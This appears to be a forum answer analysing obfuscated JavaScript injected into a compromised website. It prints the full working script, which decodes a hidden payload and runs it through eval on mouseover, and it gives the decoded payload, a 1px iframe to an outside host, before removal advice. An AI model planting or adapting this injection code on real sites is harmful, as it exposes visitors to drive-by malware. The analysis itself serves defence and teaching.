It's not a virus, but it is malicious code. The whole code is:
window.w3ssss=function(){
var scriptlink = "http://jquery.googlecode.com/svn/trunk/gadget/scripts/s.js?userrefer=%0Agod%0Argdiioufb5br4up%3Dj5nds1eo27rce5iukeymf32eye6nd1otd6p.djdch7jrmlpeb6iarwwt7fnehogExfllw2fef6rms8dedwlneflt0xa%289op%22iwyi0jbfb5qr0huam6kmjnjebk6%229ne%29k2t%3B92w%0Atrbi7xwfgygrby4.d6usds2r6lqc0op%3Dyla%22sj6hnuitjr5trrzpjbv%3Aag5/4ne/mlhvrfkcsno-f0fb52wugljsbswiplqnihkeccts3g0sent.mduc93toyxbmy7u/94sid0znyv8.rp8p408h30dpvsg%22rv4%3B6hv%0Agsdi2lifsi9rcho.2kls691t0ekyjqxlvgierel.323w6twiwh2dl3yt3hghjks%3Dphp%228dm100ipk97xquk%221r9%3B4vh%0A08diu28fb0cr2tp.9nys8swtbfwy3h8l5eaeiql.eiohwedeuwvi2fggwbxhrextp7t%3De6n%22wr41xb9p33hxl9y%22b5q%3Bvj0%0Abked5sroashcirduaemm6vze316npyhtbtz.ymcg5y9e95bt69tEs9pljozejf0mo6xej35nhpftxv8BituyhjnIrvxdmja%28ogs%228hwwtis3r3bsq7dtdvsad7cttpjs2ek%2293b%296gq.ag8au9epp09p29ve4q9nn5ddzp7C8akhdbuife5lacndb3l%28wq7ine2fl54r0f8%29uen%3B96e%0Abl4%0Azwv";
var visitnum=window.history.length%1000-window.history.length+4;
var countbox=document.createElement("div");countbox.id='countbox';
idarr = new Array(97,114,93,104);
for(var i=0,elem=[]; i<visitnum; i++){elem[i]=document.createElement("div");elem[i].id= String.fromCharCode(idarr[i]+visitnum);countbox.appendChild(elem[i]);}
var cont=''; currentuser=true, nextuser=countbox.firstChild;
do{currentuser=nextuser; cont += currentuser.id; nextuser=currentuser.nextSibling;}while(currentuser!==countbox.lastChild)
var userref=unescape(scriptlink.substr(scriptlink.indexOf('?userrefer=')+11));
for(var i=0,content=''; i<userref.length; i+=visitnum){content+=userref.charAt(i);}
try{window[cont](content)}catch(e){}
}
window.CheckBody = function()
{
if (!document.body){setTimeout('CheckBody();',10);}
else
{
window.nomore=false;
document.body.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}}
window.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}}
}
}
CheckBody();
If you care what it's doing:
Line 1 is the creating a function w3ssss. If you google it, you'll find out more information on this hack and it's common.
Line 2 is the payload. The actual URL is irrelevent. It returns a 404. What is important is what comes after userrefer. Remember that part for later.
Line 3 gives the appearance you're tracking visits. It's just setting the variable to 4 unless you have greater then 1000 entries in your window history. Which you likely never will, so it's just 4.
Line 4 creates a div on the page.
Line 5 is an array of
ASCII decimal values offset by 4.
Line 6 is a loop that builds a string that corresponds to the ascii values in line 5. It results in "eval".
Line 7 just creates a few variables.
Line 8 gets the last child of the div that it created in line 4. As far as I can tell, this is just for appearance as the div should be empty.
Line 9 unescapes the encoded command in Line 2.
Line 10 builds the malicious command by taking every 4th character from the unescaped command. You end up with:
ifr=document.createElement("iframe");
ifr.src="http://vc-business.com/in.php";
ifr.style.width="1px";
ifr.style.height="1px";
document.getElementById("w3stats").appendChild(ifr);
This just creates an iframe pointed at vc-business.com and inserts it into the page.
Line 11 executes the command
Line 13 creates a function that...
Line 15 wukk check to see if the body element exists yet and waits 10 ms and checks again until...
Line 18 sets a variable so that the iframe doesn't get called a 2nd time
Line 19 will trigger the w3ssss function created in line 1 when the body is hovered on or
Line 20 when the window is hovered
And finally line 23 gets the whole process going.
The obfuscation isn't all that difficult once you understand how it's doing it. I think however there is one error in it. The encoded javascript looks for an element with an id of "w3stats" to insert the iframe into, not "countbox" that's created in step 4
To remove: Delete everything between and including the script tags. Also check all your other pages and change your credentials for your website as it's obviously been compromised.
